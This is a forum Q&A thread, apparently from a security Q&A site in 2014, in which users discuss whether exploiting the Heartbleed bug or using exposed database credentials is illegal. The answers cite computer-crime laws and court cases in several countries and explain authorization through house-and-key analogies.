According to news reports, arrests have already been made in relation to the Heartbleed bug. It sounds like this person managed to gain access to the website's database by capturing the credentials the app used to access the database. This person then apparently used those credentials to access the database.

My question is, what part is illegal here? He was charged with "one count of unauthorized use of a computer and one count of mischief in relation to data." So, is it illegal to send a heartbeat request to a server knowing that the request will result in data leakage? If that data contained nothing but random bits, would it still be illegal or must it contain sensitive data to become illegal? Say passwords or other such info was present, does it then become illegal to have done it? Or does it become illegal to then take those credentials and log into a public-facing admin interface to the database?

What I'm confused about is where is the line between illegal hacking and just using information which is publicly visible? If a website leaves its DB credentials on its homepage with a link to a phpMyAdmin frontend to that DB, is it illegal to log in and look around?

At risk of asking multiple and broad questions which will lead to this question being closed, are there any rules of thumb to abide by when curious snooping around to see how something works crosses the line to become illegal?

My rule of thumb is, if the company doesn't have a bug bounty program, leave it the hell alone. Poking around for curiosities sake won't stand up as a defense in court.
– JayApr 17 '14 at 9:01

18

You certainly can't send a heartbleed exploit packet by accident during normal use of the site. So I'd consider the legal risk pretty high, especially if it's done repeatedly to the same host in order to learn information.
– CodesInChaosApr 17 '14 at 9:08

8

Steven - in the UK, scanning can be illegal.
– Rory Alsop♦Apr 17 '14 at 10:37

46

Rephrased title for this thread: "why is it illegal to enter someone's house if they mistakenly left it open?"
– DariusApr 17 '14 at 12:01

4

Even though there are lots of highly-voted answers already you put a 100 pt bounty asking for more information. What exactly do you think is missing from the existing answers?
– PhilippApr 19 '14 at 16:18

13 Answers
13

If you break into your neighbor's house, clearly you are in violation of the law. But if he lets you in, then you are not.

So what if you have a key? If he gave you the key along with permission to enter (to feed his dog while he's away), then you have authorization to enter. No trespass there.

On the other hand, if you find the key under his doormat, that does not imply authorization, even though it grants you access. You can get in easily enough, but it's trespassing.

Now, say you go door-to-door checking to see if anyone left a key under their doormat. You just go inside the vulnerable houses and have a look around; you don't steal anything, you're just looking. That's what's happening here with the Heartbleed problem. Someone is using their knowledge of a vulnerability (e.g. key sometimes appears under the doormat) to gain access, but they are not authorized to have access.

Yes, the keys they retrieve are accessible to anyone who understands the vulnerability, just as a key under a doormat is likewise technically accessible to the public. But that doesn't make it legal to use it.

First, this question has to be answered in a country-specific context, because each country has its own laws and regulation regarding computer crimes, intrusions, data manipulation etc.

One important thing to consider also is that the persons who will judge those cases are not technical aware people. They usually have no clear idea of what a database is, what a UDP datagram is or even sometimes what Google is. So even if an IT expert is heard by the court, the decision will mainly be based on common sense.

I am not a specialist in Canadian law, but here are my thoughts:

Sending a single packet with prior knwoledge that it can/will alter
the data stored on a server can be regarded as a crime in some countries, no matter why
it has been done (e.g. a researcher trying to reproduct a bug) and
what the impact is at the end;

The line between illegal hacking and just using information which is publicly visible is usually regarded this way by the authorities
(e.g. a prosecutor or judge): Did the organization make the information public and visible on purpose?
Or did the "attacker" use a trick to access it? At the end, this comes to the intention of the user accessing the information.

It doesn't matter if the data leaked contains useless random bits or
explicit sensible information, the access was still performed without
proper authorization. Though of course, the level of sensitivity will probably be considered as an aggravating factor.

A real life example of this situation is the recent condemnation in France of an Internet user that found some company information via Google that was not supposed to be there (it was indexed by the search-engine due to an error from the company). Even if the data integrity or availability was not at risk, and there was no actual intrusion, this internet user has been convicted of "unauthorized access to an Information System" and "data theft". A very detailed legal explanation is available here (in French).

At the end, there were two main things the authorities considered:

Disregarding how the access was performed, the data was not meant
to be public, period. And in the case of the Heartbleed bug, no one can seriously pretend that the cleartext data used by a program responsible for encrypting internet communications was supposed to be publicly available.

The user did not access the data by accident, but instead by using some
technical methods that a regular user wouldn't have been capable of. That includes Google hacking, crafting UDP datagrams, etc.

So, to answer your question, the line between illegal hacking and authorized access is basically: did the affected organization mandate or authorize you to access any of its data (e.g. via a Bug Bounty program or a penetration testing service)?

There has been a similar case in Poland, which led to the coining of the term “głębokie ukrycie” (“deeply hidden” in Polish) — basically a form of security through obscurity
– kinokijufApr 19 '14 at 21:20

1

@ack__ Actually, what got that particular journalist convicted is that he admitted to knowing that he wasn't supposed to access the documents (eventhough they were indexed by search engines). Had he just shut up and lawyered up, he probably would have gotten away with it. What this means is that if you stumble on the "illegal" information in good faith, because of the sysadmin's negligence, you're probably okay (at least in France) as long as you don't know that you should not be there. Of course, launching an exploit script (such as Heartbleed) will damage that "good faith" defense.
– executifsApr 24 '14 at 12:16

1

@executifs: Yes, this is why I highlight the intention of the user accessing the information and that the user did not access the data by accident (even though the initial discovery of the data was "accidental", his action to collect all the available information was deliberate, and he knew the organization didn't make it public on purpose.
– ack__Apr 24 '14 at 12:33

1

Alright then, I was a little confused by your choice of words. As long as we agree that the case wasn't decided on whether the discovery was accidental or not, but on the notion of "maintaining access", I second your opinion!
– executifsApr 24 '14 at 12:37

What I'm confused about is where is the line between illegal hacking and just using information which is publicly visible?

The question is whether this information is considered public, even if it's publicly visible. In this particular case it's 100% clear that this is not the case. Even when a server admin leaves this bug unpatched, it doesn't mean that you are free to use it.

at least in France, if someone demonstrate that you knew that this information was meant to be private and you took it, you can be charged.
– Simon BergotApr 17 '14 at 12:42

2

Then why do admins take security so seriously? Can't everyone just be lax and when the data leaks, just claim it was supposed to be protected and have everyone arrested?
– Stephen Solis-ReyesApr 17 '14 at 13:20

3

Well that would be really stupid to be honest. The data is gone, and a clever hacker would hide his tracks, so how do you want to make a claim. With heartbleed, there is no logging at all!
– SPRBRNApr 17 '14 at 13:55

26

@StephenSolis-Reyes : getting people arrested doesn't change a the fact that your data was stolen and leaked
– ack__Apr 17 '14 at 14:58

12

@StephenSolis-Reyes: by analogy: lock your house, or figure that any burglars will probably be arrested since burglary is illegal?
– Steve JessopApr 17 '14 at 16:21

From a purely technical viewpoint one could say that any data which can be accessed in some way is public, because technology doesn't make a difference between features and bugs. But laws are rarely that technical.

Legislation about what's illegal hacking and what isn't vary a lot around the world. I am not a lawyer, but as far as I know, many legislations consider data to be private when the owner of the system took steps to prevent public access. Should these steps turn out to be insufficient due to a software bug, accessing it is still illegal when the person who accesses them has no reason to believe that the data is supposed to be public.

When someone writes on their homepage "I set up a public MySQL database for everyone to experiment with, username is user and password is pass", it is reasonable to assume that any information in that database is public. When you have to exploit a security vulnerability in a software they use to obtain the login information, it is reasonable to assume that the information is not meant to be public.

"From a purely technical viewpoint one could say that any data which can be accessed in some way is public..." - not at all! This would mean that anything protected with open-key cryptography is public and, perhaps, even anything protected with a password in general. If you learned to factor large numbers or to compute discrete logarithm quickly, would it make most of the Internet public? (Of course, the same argument can be made about Heartbleed.)
– osaApr 20 '14 at 4:23

1

@SergeyOrshanskiy That's exactly what I was trying to say.
– PhilippApr 20 '14 at 17:18

In fact, from a technical point of view, ANYTHING can be accessed in some way. This is why we invented this public/private distinction in the first place.
– osaApr 21 '14 at 19:48

In the case of Heartbleed, one should remember that a company/sysadmin has taken the pro-active steps to protect data. They have used OpenSSL to secure a web portal. The fact that there was a bug in it that went undiscovered was not the fault of the company. They have attempted to protect data. Any court/jury, using common sense, would find for the company, not the person who gained the data via the exploit.

To modify the analogy given above: The analogy of a door left open allowing access not equating permission to enter, as well as the analogy of the key left under the mat allowing access, but not authorization, are both wrong, in this case.

I have the door to my house locked. The lock I use is a combination lock. I set the 4 digit number, and secured the lock. I am the only one who knows that combination, and the lock maker says that no one else can know that combination, without painstakingly punching in every possible 4 number sequence. My house is now safe.

Unfortunatly, unknown to me (and not even discovered by the maker of the lock) the faceplate is removable which reveals my numbers.

A thief comes along and take off the cover, gets my code, and puts it back on. Now that thief has an ability to enter my house at will. Even if I change my code (SSL Cert), it doesn't matter, the thief still has the ability to determine my new code.

You hear about the fact that the faceplate is removable and come to my house to check it out. You find out that, why YES, it is, and discover my code. You enter it, unlocking my front door and step in. You don't take anything. (At least in the US) you have now commited breaking and entering, but not theft. Any jury in the US would convict you, because I did my best to protect my stuff, yet by means of an exploit unknown to me, you were able to enter.

Unauthorized use of a computer's best analog in real world terms is trespassing. Despite the fact that a web server is publicly connected to the Internet, technically, it is private property. Someone owns that server and the software and data on it. They should have a Terms of Use for the site which indicates what is allowed usage of their server. If you deviate from those Terms of Use, you are effectively trespassing on their system and may be criminally liable for misuse.

I am not a lawyer and I do believe that there has to be intent to misuse, just like it wouldn't be possible to make a trespassing claim if someone didn't know they were on private property. Thus, it is somewhat ambiguous, but yes, generally knowingly exploiting a bug is against the terms of service and thus is illegal in and of itself. Further, once capturing someone else's credentials and using them, that is clearly illegal as you are now accessing someone else's account which is pretty much always against the terms of service and shows clear intent to "trespass" in the system.

I'm not as familiar with the "mischief in relation to data" but my guess is that it has to do with the fact that they accessed someone else's private data by breaking in to the system. That's a guess though as I'm not as familiar with that one.

With Information Security, analogies to physical-world security are often made. For instance, A building is secured with a door that's locked, around that, a fence with a gate and security guard, and so on.

Breaching a building's security layer(s) would be a criminal offense in most (all?) legislations. I'd bet that's mostly called breaking and entering.

I guess the Canadian legislation is based on this analogy. Seems logical that whether snooping around a server by exploiting the Heartbleed bug depends on the country's legislation. I suppose either the country the server is located in, or the country the server's owner is headquartered in.

Exploiting the heartbleed bug on its own isn't really analogous to breaking and entering, it's closer to standing in front of the glass wall building and taking photos of its interior with a polarizing filter, because its architects didn't think of that and its occupants are so confident nobody can see inside from the outside, it might be rather unpleasant for them if someone did.
– TildalWaveApr 17 '14 at 9:39

Gotcha, I haven't yet read about that case, that's why I was limiting my comment to exploiting the heartbleed bug alone, not what illegal activities could the learned information from exploiting it be later used for.
– TildalWaveApr 17 '14 at 9:52

And the name of the offence suggests, for "unauthorized use of a computer" it is significant whether permission was given.

It is presumed that permission is given for example to visit a website using a browser. You needn't have it in writing. It is not presumed that permission is given to use an unintentional feature such as the heartbleed flaw. So yes, it could be held to be criminal to exploit a flaw on some web server without the knowledge of the owner of the server. It doesn't necessarily matter what (if anything) you do with any information retrieved.

This does mean that under certain circumstances, using a website in violation of its T&Cs might be considered criminal. There's not much in the way of test cases yet as far as I know, and I suspect that it is going to vary significantly by jurisdiction, what is considered "using" a computer, what is considered "unauthorized", and to what extent the users of sites/servers are expected to understand what is permitted and what is not. It's also probably going to vary whether security researchers have any legal protection, and if so how far it goes.

I cannot give you legal advice of course, but my observation is that very few security researchers get prosecuted when they test or scan for flaws without explicit permission. I'm not at all sure that's because what they're doing is lawful by statute, though, or just that nobody has any interest in prosecuting them.

There's a case between Craigslist and 3Taps (in the US, not Canada) in which there isn't even any exploit of a flaw. Craigslist was ruled to have properly denied 3Taps authorization to visit the site at all for the purpose of scraping it, but AFAIK there's no decision yet whether 3Taps actions were illegal under the Computer Fraud and Abuse Act.

The dividing line is not a line. It is fuzzy and decided not purely by logic but by persuasion. Persuasion of a jury by a prosecutor.

What is legal vs illegal is not decided by those of us who work with tech. It is first decided by a few experts and then blessed by the government as a law and then interpreted by judges lawyers and a few 'lucky' people on juries.

Legislation, common law about theft, combined with the judges and juries of the court system make computer trespass illegal.

Assuming a prosecutor can prove the facts of who, what, where, when, how to the jury through log files and an expert, what defense does the bug exploiter have?

In the U.S.A there is the concept of Mens Rea, ie. having a guilty mind. Crazy people can be found not guilty because they genuinely don't know right from wrong, but this merely moves the venue of imprisonment to a psychiatric facility.

But if someone exploits a bug for gain and to another person's detriment, I think as a juror it would be difficult to convince me that the person didn't know it was wrong. If it is proven they did it, and knew or should have known it was wrong, that's enough for a guilty vote so I can get back to life and quit being a juror.

You obtained this information using "navigation" procedures that are intrusive.

You were not authorized intrude into private areas, or breach a barrier, etc., and you do so and see something, that would be a crime.

So if the unauthorized information was wrongly posted on the home page and you read it, that would be their problem not yours. If you somehow "broke into" the system and read something unauthorized, it would be a crime.

Imagine a house surrounded by a fence. If you saw something "unauthorized" by looking through, around, or above the fence, that would not be illegal. If you climbed the fence (without authorization) and "saw something" as a result, that would be illegal. If you climbed the fence because the owner hired you to clean it and you saw something, that would not be illegal.

Q: Is it illegal to send a heartbeat request to a server knowing that the request will result in data leakage?

A: Sure. Search [cfaa]. The better question is, Are you likely to be prosecuted and put in federal prison? If the server is at the Pentagon, very possibly.

Q: If that data contained nothing but random bits, would it still be illegal or must it contain sensitive data to become illegal?

A: Theoretically if the data and the value of the computer usage is below a certain threshold you would not be subject to harsh computer-crime laws such as CFAA. Do you want to bet the next several years of your life on your interpretation of the law vs. that of the authorities? And do you think they'd believe your claim that the data is "random bits"? What if the prosecuting attorney claims they're encrypted nuclear bomb codes? Who do you think the nontechnical judge and jury would believe?

Q: Say passwords or other such info was present, does it then become illegal to have done it? Or does it become illegal to then take those credentials and log into a public-facing admin interface to the database?

A: Keep reading the CFAA.

Q: What I'm confused about is where is the line between illegal hacking and just using information which is publicly visible? If a website leaves its DB credentials on its homepage with a link to a phpMyAdmin frontend to that DB, is it illegal to log in and look around?

A: Possibly. You could pay a lawyer $25,000 to make the argument that leaving the DB credentials visible constitutes consent and you are therefore innocent. If you don't have $25,000, you might wind up having to plead guilty.

Q: At risk of asking multiple and broad questions which will lead to this question being closed, are there any rules of thumb to abide by when curiously snooping around to see how something works crosses the line to become illegal?

A: Again, assuming your "rule of thumb" is the same as that of the authorities can be a risky game.

Historically, there needed to be criminal intent for something to be a crime.

Nowadays, since incrementing by one in a script against a public webserver and logging the output can land you in prison, pretty much anything can be illegal if it involves a computer and you have annoyed someone.

I know some people who put Burp (for example) inline and go about their usual browsing. They find more bugs than you might think this way and, as I mentioned anything involving a computer can be illegal, I wouldn't recommend talking to people about bugs that you see in this if you aren't 100% positive how your information will be received.

I, personally, do zero manipulation and discovery of anything without a contractual agreement for work in place and would recommend that all readers do the same.

So if you can't disclose to the owners of the bug without being sent to a gulag, and you can't ethically sell the bug to an exploit house, nor can you post it on a full disclosure forum, what can you do exactly?

Welcome to the state of the industry. Legality is in the eye of those with a political agenda.